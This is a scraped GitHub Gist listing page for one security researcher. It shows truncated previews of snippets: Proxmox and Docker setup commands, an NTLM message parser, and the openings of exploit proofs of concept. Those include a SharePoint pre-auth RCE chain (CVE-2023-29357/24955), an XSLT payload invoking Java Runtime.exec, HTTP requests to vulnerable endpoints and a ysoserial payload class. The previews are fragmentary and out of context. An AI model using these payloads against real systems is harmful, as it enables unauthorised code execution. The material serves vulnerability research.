Skip to content

Instantly share code, notes, and snippets.

testanull /
Created December 28, 2023 04:11 — forked from reluce/
Prepare Ubuntu 22.04 Cloud Image and Template for Proxmox
# All commands will be executed on a Proxmox host
sudo apt update -y && sudo apt install libguestfs-tools -y
# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent
# Read and set root user password from file.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt
# Create an additional user.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser"
# Set password for that user.
testanull /
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
testanull /
Created September 7, 2023 02:53
Install docker && docker-compose on Ubuntu 20.04
sudo su
wget -qO- | sh
COMPOSE_VERSION=`git ls-remote | grep refs/tags | grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" | sort --version-sort | tail -n 2 | head -n 1`
sudo sh -c "curl -L${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
sudo chmod +x /usr/local/bin/docker-compose
# You're good to go, no more 404 not found!
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close
testanull /
Created March 8, 2023 07:44
Python 2 parse ntlm message
def parseNtlmMsg(msg):
def decode_int(byte_string):
return int(byte_string[::-1].encode('hex'), 16)
def decode_string(byte_string):
return byte_string.replace('\x00', '')
target_info_fields = msg[40:48]
target_info_len = decode_int(target_info_fields[0:2])
target_info_offset = decode_int(target_info_fields[4:8])
<xsl:stylesheet version="1.0" xmlns:xsl="">
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
import requests
import random
import string
import sys
import time
import requests
import urllib3
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1317
<?xml version="1.0"?>
public class JavaCharStream
public char readChar() throws
if ((buffer[bufpos] = c = ReadByte()) != '\\')
// found a non-backslash char.
if ((c == 'u') && ((backSlashCnt & 1) == 1))
package ysoserial.payloads;
import org.apache.catalina.connector.Response;
import org.apache.catalina.connector.ResponseFacade;
import org.apache.catalina.core.ApplicationFilterChain;